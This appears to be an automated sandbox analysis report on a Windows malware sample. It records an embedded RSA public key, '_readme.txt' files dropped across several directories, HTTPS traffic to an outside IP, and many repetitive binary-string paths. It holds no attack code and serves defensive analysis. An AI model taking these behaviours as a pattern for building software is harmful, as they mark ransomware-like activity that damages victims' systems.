Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU	2_2_00489E70
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\_readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\$WinREAgent\_readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\$WinREAgent\Scratch\_readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\_readme.txt	Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\SystemAppData\mp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310717892.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316137935.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yewy\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\H source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\h source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\RT source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\S source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error? source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo+ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289217814.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288830631.0000000003CD1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320944072.00000000042C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\wy\ Data source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AppData\ation Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304875580.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304461865.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305780376.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\_ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ta\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y6 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.00000000044EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\pCl source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310492810.0000000003CAE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.000000000454A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\yewy\load_prod.pdb\U" source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ft.Wi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288881573.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279635159.0000000003D06000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280141938.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288254715.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
